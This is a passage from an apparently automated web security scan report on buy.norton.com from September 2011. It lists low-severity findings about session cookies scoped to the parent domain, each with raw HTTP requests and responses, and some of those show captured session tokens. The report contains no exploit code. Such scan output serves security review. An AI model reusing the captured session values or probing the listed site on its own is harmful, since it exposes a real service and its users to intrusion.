GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=
Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 455

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/redirector/e
...[SNIP]...

9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 54738

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 52186

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 48409

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:52 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 63835

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.6. http://buy.norton.com/estore/mf/landingProductFeatures  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:18 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 55880
Connection: Keep-Alive


<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js i
...[SNIP]...

9.7. http://buy.norton.com/estore/mf/landingPromotion  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/landingPromotion

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingPromotion HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50623

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 68924

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 73974

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.10. http://buy.norton.com/estore/mf/upgradeCenter  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/upgradeCenter

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeCenter HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 137137

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.11. http://buy.norton.com/estore/mf/upgradeRenewal  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/upgradeRenewal

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 58568
Connection: Keep-Alive

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 41047

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:17 GMT
Pragma: no-cache
Location: http://buy.norton.com/estore/mf/errorProductNotFound
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Content-Language: de-CH
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 299

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/er
...[SNIP]...

9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Fri, 09 Sep 2011 21:25:51 GMT
Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=true
Set-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign
Content-Length: 0


9.15. http://buy.norton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:16 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=f7d3c8fa-e003-4390-a682-049bba2b3c7d1315603876608
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
